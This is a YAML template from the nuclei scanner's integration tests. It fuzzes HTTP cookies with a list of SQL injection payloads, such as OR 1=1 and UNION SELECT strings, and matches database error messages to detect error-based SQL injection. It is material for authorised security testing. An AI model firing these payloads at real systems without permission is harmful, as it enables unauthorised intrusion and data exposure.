GitHub Repository: projectdiscovery/nuclei
Path: blob/dev/integration_tests/fuzz/fuzz-cookie-error-sqli.yaml
```yaml
id: cookie-fuzzing-error-sqli

info:
  name: fuzzing error sqli payloads in cookie
  author: pdteam
  severity: info
  description: |
    This template attempts to find SQL injection vulnerabilities by fuzzing http cookies with SQL injection payloads.
    Note: this is example template, and payloads/matchers need to be modified appropriately.

http:
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'
          - len(cookie) > 0
        condition: and

    payloads:
      sqli:
        - "'"
        - ''
        - '`'
        - '``'
        - ','
        - '"'
        - ""
        - /
        - //
        - \
        - \\
        - ;
        - -- or #
        - '" OR 1 = 1 -- -'
        - ' OR '' = '
        - '='
        - 'LIKE'
        - "'=0--+"
        - OR 1=1
        - "' OR 'x'='x"
        - "' AND id IS NULL; --"
        - "'''''''''''''UNION SELECT '2"
        - '%00'

    fuzzing:
      - part: cookie
        type: postfix
        mode: single
        fuzz:
          - '{{sqli}}'

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - "unrecognized token:"
          - "syntax error"
          - "null"
          - "SELECTs to the left and right of UNION do not have the same number of result columns"
```